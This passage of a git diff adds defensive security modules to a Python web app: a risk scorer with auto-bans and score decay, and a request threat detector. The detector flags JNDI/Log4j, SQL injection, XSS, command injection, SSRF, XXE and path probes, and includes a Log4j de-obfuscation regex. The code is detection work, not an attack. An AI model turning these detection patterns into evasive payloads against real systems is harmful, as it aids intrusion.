self._logger.debug("应用延迟: action=%s delay=%.3f", getattr(strategy.action, "value", strategy.action), delay)
time.sleep(delay)
def get_captcha_requirement(self, strategy: ResponseStrategy) -> dict:
"""返回验证码要求 {"required": True, "level": 2}"""
level = 1
try:
level = int(getattr(strategy, "captcha_level", 1) or 1)
except Exception:
level = 1
level = self._normalize_captcha_level(level)
required = True
try:
required = getattr(strategy, "action", None) != ResponseAction.BLOCK
except Exception:
required = True
payload = {"required": bool(required), "level": level}
self._logger.debug("验证码要求: %s", payload)
return payload
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _normalize_captcha_level(self, level: Any) -> int:
try:
i = int(level)
except Exception:
i = 1
if i <= 1:
return 1
if i == 2:
return 2
return 3

389
security/risk_scorer.py Normal file
View File

@@ -0,0 +1,389 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import math
from dataclasses import dataclass
from datetime import timedelta
from typing import Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str, parse_cst_datetime
from . import constants as C
from .blacklist import BlacklistManager
@dataclass(frozen=True)
class _ScoreUpdateResult:
ip_score: int
user_score: int
@dataclass(frozen=True)
class _BanAction:
reason: str
duration_hours: Optional[int] = None
permanent: bool = False
class RiskScorer:
"""风险评分引擎 - 计算IP和用户的风险分数"""
def __init__(
self,
*,
auto_ban_enabled: bool = True,
auto_ban_duration_hours: int = 24,
high_risk_threshold: int = 80,
high_risk_window_hours: int = 1,
high_risk_permanent_ban_count: int = 3,
blacklist_manager: Optional[BlacklistManager] = None,
) -> None:
self.auto_ban_enabled = bool(auto_ban_enabled)
self.auto_ban_duration_hours = max(1, int(auto_ban_duration_hours))
self.high_risk_threshold = max(0, int(high_risk_threshold))
self.high_risk_window_hours = max(1, int(high_risk_window_hours))
self.high_risk_permanent_ban_count = max(1, int(high_risk_permanent_ban_count))
self.blacklist = blacklist_manager or BlacklistManager()
def get_ip_score(self, ip_address: str) -> int:
"""获取IP风险分(0-100),从数据库读取"""
ip_text = str(ip_address or "").strip()[:64]
if not ip_text:
return 0
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip_text,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_user_score(self, user_id: int) -> int:
"""获取用户风险分(0-100)"""
if user_id is None:
return 0
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (user_id_int,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_combined_score(self, ip: str, user_id: int = None) -> int:
"""综合风险分 = max(IP分, 用户分) + 行为加成"""
base = max(self.get_ip_score(ip), self.get_user_score(user_id) if user_id is not None else 0)
bonus = self._get_behavior_bonus(ip, user_id)
return max(0, min(100, int(base + bonus)))
def record_threat(
self,
ip: str,
user_id: int,
threat_type: str,
score: int,
request_path: str = None,
payload: str = None,
):
"""记录威胁事件到数据库并更新IP/用户风险分"""
ip_text = str(ip or "").strip()[:64]
user_id_int = int(user_id) if user_id is not None else None
threat_type_text = str(threat_type or "").strip()[:64] or "unknown"
score_int = max(0, int(score))
path_text = str(request_path or "").strip()[:512] if request_path else None
payload_text = str(payload or "").strip() if payload else None
if payload_text and len(payload_text) > 2048:
payload_text = payload_text[:2048]
now_str = get_cst_now_str()
ip_ban_action: Optional[_BanAction] = None
user_ban_action: Optional[_BanAction] = None
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (
threat_type, score, ip, user_id, request_path, value_preview, created_at
) VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(
threat_type_text,
score_int,
ip_text or None,
user_id_int,
path_text,
payload_text,
now_str,
),
)
update = self._update_scores(cursor, ip_text, user_id_int, score_int, now_str)
if self.auto_ban_enabled:
ip_ban_action, user_ban_action = self._get_auto_ban_actions(
cursor,
ip_text,
user_id_int,
threat_type_text,
score_int,
update,
)
conn.commit()
if not self.auto_ban_enabled:
return
if ip_ban_action and ip_text:
self.blacklist.ban_ip(
ip_text,
reason=ip_ban_action.reason,
duration_hours=ip_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=ip_ban_action.permanent,
)
if user_ban_action and user_id_int is not None:
self.blacklist._ban_user_internal(
user_id_int,
reason=user_ban_action.reason,
duration_hours=user_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=user_ban_action.permanent,
)
def decay_scores(self):
"""风险分衰减 - 定期调用,降低历史风险分"""
now = get_cst_now()
now_str = now.strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT ip, risk_score, updated_at, created_at FROM ip_risk_scores")
for row in cursor.fetchall():
ip = row["ip"]
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, updated_at = ? WHERE ip = ?",
(new_score, now_str, ip),
)
cursor.execute("SELECT user_id, risk_score, updated_at, created_at FROM user_risk_scores")
for row in cursor.fetchall():
user_id = int(row["user_id"])
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, updated_at = ? WHERE user_id = ?",
(new_score, now_str, user_id),
)
conn.commit()
def _update_ip_score(self, ip: str, score_delta: int):
"""更新IP风险分"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, ip_text, None, delta, now_str)
conn.commit()
def _update_user_score(self, user_id: int, score_delta: int):
"""更新用户风险分"""
if user_id is None:
return
user_id_int = int(user_id)
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, "", user_id_int, delta, now_str)
conn.commit()
def reset_ip_score(self, ip: str) -> bool:
"""清零指定IP的风险分"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT ip FROM ip_risk_scores WHERE ip = ?", (ip_text,))
row = cursor.fetchone()
if row:
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = 0, last_seen = ?, updated_at = ? WHERE ip = ?",
(now_str, now_str, ip_text),
)
else:
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 0, ?, ?, ?)
""",
(ip_text, now_str, now_str, now_str),
)
conn.commit()
return True
def _update_scores(
self,
cursor,
ip: str,
user_id: Optional[int],
score_delta: int,
now_str: str,
) -> _ScoreUpdateResult:
ip_score = 0
user_score = 0
if ip:
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip,))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
ip_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE ip = ?",
(ip_score, now_str, now_str, ip),
)
else:
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(ip, ip_score, now_str, now_str, now_str),
)
if user_id is not None:
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (int(user_id),))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
user_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE user_id = ?",
(user_score, now_str, now_str, int(user_id)),
)
else:
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(int(user_id), user_score, now_str, now_str, now_str),
)
return _ScoreUpdateResult(ip_score=ip_score, user_score=user_score)
def _get_auto_ban_actions(
self,
cursor,
ip: str,
user_id: Optional[int],
threat_type: str,
score: int,
update: _ScoreUpdateResult,
) -> tuple[Optional["_BanAction"], Optional["_BanAction"]]:
ip_action: Optional[_BanAction] = None
user_action: Optional[_BanAction] = None
if threat_type == C.THREAT_TYPE_JNDI_INJECTION:
if ip:
ip_action = _BanAction(reason="JNDI injection detected", permanent=True)
if user_id is not None:
user_action = _BanAction(reason="JNDI injection detected", permanent=True)
return ip_action, user_action
if ip and update.ip_score >= 100:
ip_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if user_id is not None and update.user_score >= 100:
user_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if score < self.high_risk_threshold:
return ip_action, user_action
window_start = (get_cst_now() - timedelta(hours=self.high_risk_window_hours)).strftime("%Y-%m-%d %H:%M:%S")
if ip:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE ip = ? AND score >= ? AND created_at >= ?
""",
(ip, int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
ip_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
if user_id is not None:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE user_id = ? AND score >= ? AND created_at >= ?
""",
(int(user_id), int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
user_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
return ip_action, user_action
def _get_behavior_bonus(self, ip: str, user_id: Optional[int]) -> int:
return 0
def _hours_since(self, dt_str: Optional[str], now) -> int:
if not dt_str:
return 0
try:
dt = parse_cst_datetime(str(dt_str))
except Exception:
return 0
seconds = (now - dt).total_seconds()
if seconds <= 0:
return 0
return int(seconds // 3600)
def _apply_hourly_decay(self, score: int, hours: int) -> int:
score_int = max(0, int(score))
if score_int <= 0 or hours <= 0:
return score_int
decayed = int(math.floor(score_int * (0.9**int(hours))))
return max(0, min(100, decayed))

410
security/threat_detector.py Normal file
View File

@@ -0,0 +1,410 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Iterable, List, Optional, Tuple
from urllib.parse import unquote_plus
from . import constants as C
@dataclass
class ThreatResult:
threat_type: str
score: int
field_name: str
rule: str = ""
matched: str = ""
value_preview: str = ""
def to_dict(self) -> dict:
return {
"threat_type": self.threat_type,
"score": int(self.score),
"field_name": self.field_name,
"rule": self.rule,
"matched": self.matched,
"value_preview": self.value_preview,
}
class ThreatDetector:
def __init__(
self,
*,
max_value_length: int = 4096,
max_decode_rounds: int = 2,
) -> None:
self.max_value_length = max(64, int(max_value_length))
self.max_decode_rounds = max(0, int(max_decode_rounds))
def scan_input(self, value: Any, field_name: str = "value") -> List[ThreatResult]:
"""扫描单个输入值(支持 dict/list 等嵌套结构)。"""
results: List[ThreatResult] = []
for sub_field, leaf in self._flatten_value(value, field_name):
text = self._stringify(leaf)
if not text:
continue
if len(text) > self.max_value_length:
text = text[: self.max_value_length]
results.extend(self._scan_text(text, sub_field))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
def scan_request(self, request: Any) -> List[ThreatResult]:
"""扫描整个请求对象(兼容 Flask Request / dict 风格对象)。"""
results: List[ThreatResult] = []
for field_name, value in self._extract_request_fields(request):
results.extend(self.scan_input(value, field_name))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
# ==================== Internal scanning ====================
def _scan_text(self, text: str, field_name: str) -> List[ThreatResult]:
hits: List[ThreatResult] = []
for check in [
self._check_jndi_injection,
self._check_sql_injection,
self._check_xss,
self._check_path_traversal,
self._check_command_injection,
self._check_ssrf,
self._check_xxe,
self._check_template_injection,
self._check_sensitive_path_probe,
]:
result = check(text)
if result:
threat_type, score, rule, matched = result
hits.append(
ThreatResult(
threat_type=threat_type,
score=int(score),
field_name=field_name,
rule=rule,
matched=matched,
value_preview=self._preview(text),
)
)
return hits
def _check_jndi_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
# 1) Direct match
m = C.JNDI_DIRECT_RE.search(text)
if m:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT", m.group(0))
# 2) URL-decoded
decoded = self._multi_unquote(text)
if decoded != text:
m2 = C.JNDI_DIRECT_RE.search(decoded)
if m2:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT_URL_DECODED", m2.group(0))
# 3) Obfuscation patterns (raw/decoded)
for candidate, rule in [(text, "JNDI_OBFUSCATED"), (decoded, "JNDI_OBFUSCATED_URL_DECODED")]:
m3 = C.JNDI_OBFUSCATED_RE.search(candidate)
if m3:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, rule, m3.group(0))
# 4) Try limited de-obfuscation to reveal ${jndi:...}
deobf = self._deobfuscate_log4j(decoded)
if deobf and deobf != decoded:
m4 = C.JNDI_DIRECT_RE.search(deobf)
if m4:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, "JNDI_DEOBFUSCATED", m4.group(0))
# 5) Nested expression heuristic
for candidate in [text, decoded]:
m5 = C.NESTED_EXPRESSION_RE.search(candidate)
if m5:
return (C.THREAT_TYPE_NESTED_EXPRESSION, C.SCORE_NESTED_EXPRESSION, "NESTED_EXPRESSION", m5.group(0))
return None
def _check_sql_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.SQLI_UNION_SELECT_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_UNION_SELECT", m.group(0))
m = C.SQLI_OR_1_EQ_1_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_OR_1_EQ_1", m.group(0))
return None
def _check_xss(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.XSS_SCRIPT_TAG_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_SCRIPT_TAG", m.group(0))
m = C.XSS_JS_PROTOCOL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_JS_PROTOCOL", m.group(0))
m = C.XSS_INLINE_EVENT_HANDLER_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_INLINE_EVENT_HANDLER", m.group(0))
return None
def _check_path_traversal(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.PATH_TRAVERSAL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_PATH_TRAVERSAL, C.SCORE_PATH_TRAVERSAL, "PATH_TRAVERSAL", m.group(0))
return None
def _check_command_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.CMD_INJECTION_SUBSHELL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_SUBSHELL", m.group(0))
m = C.CMD_INJECTION_OPERATOR_WITH_CMD_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_OPERATOR_WITH_CMD", m.group(0))
return None
def _check_ssrf(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.SSRF_LOCALHOST_URL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_LOCALHOST{suffix}", m.group(0))
m = C.SSRF_INTERNAL_IP_URL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_INTERNAL_IP{suffix}", m.group(0))
m = C.SSRF_DANGEROUS_PROTOCOL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_DANGEROUS_PROTOCOL{suffix}", m.group(0))
return None
def _check_xxe(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m_doctype = C.XXE_DOCTYPE_RE.search(candidate)
if not m_doctype:
continue
m_entity = C.XXE_ENTITY_RE.search(candidate)
if not m_entity:
continue
m_sys_pub = C.XXE_SYSTEM_PUBLIC_RE.search(candidate)
if not m_sys_pub:
continue
matched = f"{m_doctype.group(0)} {m_entity.group(0)} {m_sys_pub.group(0)}"
return (C.THREAT_TYPE_XXE, C.SCORE_XXE, f"XXE_KEYWORD_COMBO{suffix}", matched)
return None
def _check_template_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.TEMPLATE_JINJA_EXPR_RE.search(candidate)
if m:
return (C.THREAT_TYPE_TEMPLATE_INJECTION, C.SCORE_TEMPLATE_INJECTION, f"TEMPLATE_JINJA_EXPR{suffix}", m.group(0))
m = C.TEMPLATE_JINJA_STMT_RE.search(candidate)
if m:
return (C.THREAT_TYPE_TEMPLATE_INJECTION, C.SCORE_TEMPLATE_INJECTION, f"TEMPLATE_JINJA_STMT{suffix}", m.group(0))
m = C.TEMPLATE_VELOCITY_DIRECTIVE_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_TEMPLATE_INJECTION,
C.SCORE_TEMPLATE_INJECTION,
f"TEMPLATE_VELOCITY_DIRECTIVE{suffix}",
m.group(0),
)
return None
def _check_sensitive_path_probe(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.SENSITIVE_PATH_DOTFILES_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_SENSITIVE_PATH_PROBE,
C.SCORE_SENSITIVE_PATH_PROBE,
f"SENSITIVE_PATH_DOTFILES{suffix}",
m.group(0),
)
m = C.SENSITIVE_PATH_PROBE_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_SENSITIVE_PATH_PROBE,
C.SCORE_SENSITIVE_PATH_PROBE,
f"SENSITIVE_PATH_PROBE{suffix}",
m.group(0),
)
return None
# ==================== Helpers ====================
def _preview(self, text: str, limit: int = 160) -> str:
s = text.replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t")
if len(s) <= limit:
return s
return s[: limit - 3] + "..."
def _stringify(self, value: Any) -> str:
if value is None:
return ""
if isinstance(value, bytes):
try:
return value.decode("utf-8", errors="ignore")
except Exception:
return ""
try:
return str(value)
except Exception:
return ""
def _multi_unquote(self, text: str) -> str:
s = text
for _ in range(self.max_decode_rounds):
try:
nxt = unquote_plus(s)
except Exception:
break
if nxt == s:
break
s = nxt
return s
def _deobfuscate_log4j(self, text: str) -> str:
# Replace ${...:-x} with x (including ${::-x}).
# This is intentionally conservative to reduce false positives.
import re
s = text
pattern = re.compile(r"\$\{[^{}]{0,50}:-([a-zA-Z])\}")
for _ in range(3):
nxt = pattern.sub(lambda m: m.group(1), s)
if nxt == s:
break
s = nxt
return s
def _flatten_value(self, value: Any, field_name: str) -> Iterable[Tuple[str, Any]]:
if isinstance(value, dict):
for k, v in value.items():
key = self._stringify(k) or "key"
sub_name = f"{field_name}.{key}" if field_name else key
yield from self._flatten_value(v, sub_name)
return
if isinstance(value, (list, tuple, set)):
for i, v in enumerate(value):
sub_name = f"{field_name}[{i}]"
yield from self._flatten_value(v, sub_name)
return
yield (field_name, value)
def _extract_request_fields(self, request: Any) -> List[Tuple[str, Any]]:
# dict-like input (useful for unit tests / non-Flask callers)
if isinstance(request, dict):
out: List[Tuple[str, Any]] = []
for k, v in request.items():
out.append((self._stringify(k) or "request", v))
return out
out: List[Tuple[str, Any]] = []
# path / method
for attr_name in ["method", "path", "full_path", "url", "remote_addr"]:
try:
v = getattr(request, attr_name, None)
except Exception:
v = None
if v:
out.append((attr_name, v))
# args / form (Flask MultiDict)
out.extend(self._extract_multidict(getattr(request, "args", None), "args"))
out.extend(self._extract_multidict(getattr(request, "form", None), "form"))
# headers
try:
headers = getattr(request, "headers", None)
if headers is not None:
try:
items = headers.items()
except Exception:
items = []
for k, v in items:
out.append((f"headers.{self._stringify(k)}", v))
except Exception:
pass
# cookies
try:
cookies = getattr(request, "cookies", None)
if isinstance(cookies, dict):
for k, v in cookies.items():
out.append((f"cookies.{self._stringify(k)}", v))
except Exception:
pass
# json body
data = None
try:
get_json = getattr(request, "get_json", None)
if callable(get_json):
data = get_json(silent=True)
except Exception:
data = None
if data is not None:
for name, v in self._flatten_value(data, "json"):
out.append((name, v))
return out
# raw body (as a fallback)
try:
get_data = getattr(request, "get_data", None)
if callable(get_data):
raw = get_data(cache=True, as_text=True)
if raw:
out.append(("body", raw))
except Exception:
pass
return out
def _extract_multidict(self, md: Any, prefix: str) -> List[Tuple[str, Any]]:
out: List[Tuple[str, Any]] = []
if md is None:
return out
try:
items = md.items(multi=True)
except Exception:
try:
items = md.items()
except Exception:
return out
for k, v in items:
out.append((f"{prefix}.{self._stringify(k)}", v))
return out

1494
services/kdocs_uploader.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -4,6 +4,7 @@ from __future__ import annotations
import threading import threading
import time import time
from datetime import datetime
from app_config import get_config from app_config import get_config
from app_logger import get_logger from app_logger import get_logger
@@ -26,6 +27,9 @@ USER_ACCOUNTS_EXPIRE_SECONDS = int(getattr(config, "USER_ACCOUNTS_EXPIRE_SECONDS
BATCH_TASK_EXPIRE_SECONDS = int(getattr(config, "BATCH_TASK_EXPIRE_SECONDS", 21600)) BATCH_TASK_EXPIRE_SECONDS = int(getattr(config, "BATCH_TASK_EXPIRE_SECONDS", 21600))
PENDING_RANDOM_EXPIRE_SECONDS = int(getattr(config, "PENDING_RANDOM_EXPIRE_SECONDS", 7200)) PENDING_RANDOM_EXPIRE_SECONDS = int(getattr(config, "PENDING_RANDOM_EXPIRE_SECONDS", 7200))
# 金山文档离线通知状态:每次掉线只通知一次,恢复在线后重置
_kdocs_offline_notified: bool = False
def cleanup_expired_data() -> None: def cleanup_expired_data() -> None:
"""定期清理过期数据,防止内存泄漏(逻辑保持不变)。""" """定期清理过期数据,防止内存泄漏(逻辑保持不变)。"""
@@ -91,6 +95,87 @@ def cleanup_expired_data() -> None:
logger.debug(f"已清理 {deleted_random} 个过期随机延迟任务") logger.debug(f"已清理 {deleted_random} 个过期随机延迟任务")
def check_kdocs_online_status() -> None:
"""检测金山文档登录状态,如果离线则发送邮件通知管理员(每次掉线只通知一次)"""
global _kdocs_offline_notified
try:
import database
from services.kdocs_uploader import get_kdocs_uploader
# 获取系统配置
cfg = database.get_system_config()
if not cfg:
return
# 检查是否启用了金山文档功能
kdocs_enabled = int(cfg.get("kdocs_enabled") or 0)
if not kdocs_enabled:
return
# 检查是否启用了管理员通知
admin_notify_enabled = int(cfg.get("kdocs_admin_notify_enabled") or 0)
admin_notify_email = (cfg.get("kdocs_admin_notify_email") or "").strip()
if not admin_notify_enabled or not admin_notify_email:
return
# 获取金山文档状态
kdocs = get_kdocs_uploader()
status = kdocs.get_status()
login_required = status.get("login_required", False)
last_login_ok = status.get("last_login_ok")
# 如果需要登录或最后登录状态不是成功
is_offline = login_required or (last_login_ok is False)
if is_offline:
# 已经通知过了,不再重复通知
if _kdocs_offline_notified:
logger.debug("[KDocs监控] 金山文档离线,已通知过,跳过重复通知")
return
# 发送邮件通知
try:
import email_service
now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
subject = "【金山文档离线告警】需要重新登录"
body = f"""
您好,
系统检测到金山文档上传功能已离线,需要重新扫码登录。
检测时间:{now_str}
状态详情:
- 需要登录:{login_required}
- 上次登录状态:{last_login_ok}
请尽快登录后台,在"系统配置""金山文档上传"中点击"获取登录二维码"重新登录。
---
此邮件由系统自动发送,请勿直接回复。
"""
email_service.send_email_async(
to_email=admin_notify_email,
subject=subject,
body=body,
email_type="kdocs_offline_alert",
)
_kdocs_offline_notified = True # 标记为已通知
logger.warning(f"[KDocs监控] 金山文档离线,已发送通知邮件到 {admin_notify_email}")
except Exception as e:
logger.error(f"[KDocs监控] 发送离线通知邮件失败: {e}")
else:
# 恢复在线,重置通知状态
if _kdocs_offline_notified:
logger.info("[KDocs监控] 金山文档已恢复在线,重置通知状态")
_kdocs_offline_notified = False
logger.debug("[KDocs监控] 金山文档状态正常")
except Exception as e:
logger.error(f"[KDocs监控] 检测失败: {e}")
def start_cleanup_scheduler() -> None: def start_cleanup_scheduler() -> None:
"""启动定期清理调度器""" """启动定期清理调度器"""
@@ -106,3 +191,22 @@ def start_cleanup_scheduler() -> None:
cleanup_thread.start() cleanup_thread.start()
logger.info("内存清理调度器已启动") logger.info("内存清理调度器已启动")
def start_kdocs_monitor() -> None:
"""启动金山文档状态监控"""
def monitor_loop():
# 启动后等待 60 秒再开始检测(给系统初始化的时间)
time.sleep(60)
while True:
try:
check_kdocs_online_status()
time.sleep(300) # 每5分钟检测一次
except Exception as e:
logger.error(f"[KDocs监控] 监控任务执行失败: {e}")
time.sleep(60)
monitor_thread = threading.Thread(target=monitor_loop, daemon=True, name="kdocs-monitor")
monitor_thread.start()
logger.info("[KDocs监控] 金山文档状态监控已启动每5分钟检测一次")

View File

@@ -87,19 +87,32 @@ def run_scheduled_task(skip_weekday_check: bool = False) -> None:
cfg = database.get_system_config() cfg = database.get_system_config()
enable_screenshot_scheduled = cfg.get("enable_screenshot", 0) == 1 enable_screenshot_scheduled = cfg.get("enable_screenshot", 0) == 1
user_accounts = {}
account_ids = []
for user in approved_users: for user in approved_users:
user_id = user["id"] user_id = user["id"]
accounts = safe_get_user_accounts_snapshot(user_id) accounts = safe_get_user_accounts_snapshot(user_id)
if not accounts: if not accounts:
load_user_accounts(user_id) load_user_accounts(user_id)
accounts = safe_get_user_accounts_snapshot(user_id) accounts = safe_get_user_accounts_snapshot(user_id)
if accounts:
user_accounts[user_id] = accounts
account_ids.extend(list(accounts.keys()))
account_statuses = database.get_account_status_batch(account_ids)
for user in approved_users:
user_id = user["id"]
accounts = user_accounts.get(user_id, {})
if not accounts:
continue
for account_id, account in accounts.items(): for account_id, account in accounts.items():
total_accounts += 1 total_accounts += 1
if account.is_running: if account.is_running:
continue continue
account_status_info = database.get_account_status(account_id) account_status_info = account_statuses.get(str(account_id))
if account_status_info: if account_status_info:
status = account_status_info["status"] if "status" in account_status_info.keys() else "active" status = account_status_info["status"] if "status" in account_status_info.keys() else "active"
if status == "suspended": if status == "suspended":
@@ -150,6 +163,16 @@ def scheduled_task_worker() -> None:
"""定时任务工作线程""" """定时任务工作线程"""
import schedule import schedule
def decay_risk_scores():
"""风险分衰减:每天定时执行一次"""
try:
from security.risk_scorer import RiskScorer
RiskScorer().decay_scores()
logger.info("[定时任务] 风险分衰减已执行")
except Exception as e:
logger.exception(f"[定时任务] 风险分衰减执行失败: {e}")
def cleanup_expired_captcha(): def cleanup_expired_captcha():
try: try:
deleted_count = safe_cleanup_expired_captcha() deleted_count = safe_cleanup_expired_captcha()
@@ -362,7 +385,12 @@ def scheduled_task_worker() -> None:
if schedule_time_cst != str(schedule_time_raw or "").strip(): if schedule_time_cst != str(schedule_time_raw or "").strip():
logger.warning(f"[定时任务] 系统定时时间格式无效,已回退到 {schedule_time_cst} (原值: {schedule_time_raw!r})") logger.warning(f"[定时任务] 系统定时时间格式无效,已回退到 {schedule_time_cst} (原值: {schedule_time_raw!r})")
signature = (schedule_enabled, schedule_time_cst) risk_decay_time_raw = os.environ.get("RISK_SCORE_DECAY_TIME_CST", "04:00")
risk_decay_time_cst = _normalize_hhmm(risk_decay_time_raw, default="04:00")
if risk_decay_time_cst != str(risk_decay_time_raw or "").strip():
logger.warning(f"[定时任务] 风险分衰减时间格式无效,已回退到 {risk_decay_time_cst} (原值: {risk_decay_time_raw!r})")
signature = (schedule_enabled, schedule_time_cst, risk_decay_time_cst)
config_changed = schedule_state.get("signature") != signature config_changed = schedule_state.get("signature") != signature
is_first_run = schedule_state.get("signature") is None is_first_run = schedule_state.get("signature") is None
if (not force) and (not config_changed): if (not force) and (not config_changed):
@@ -374,6 +402,8 @@ def scheduled_task_worker() -> None:
cleanup_time_cst = "03:00" cleanup_time_cst = "03:00"
schedule.every().day.at(cleanup_time_cst).do(cleanup_old_data) schedule.every().day.at(cleanup_time_cst).do(cleanup_old_data)
schedule.every().day.at(risk_decay_time_cst).do(decay_risk_scores)
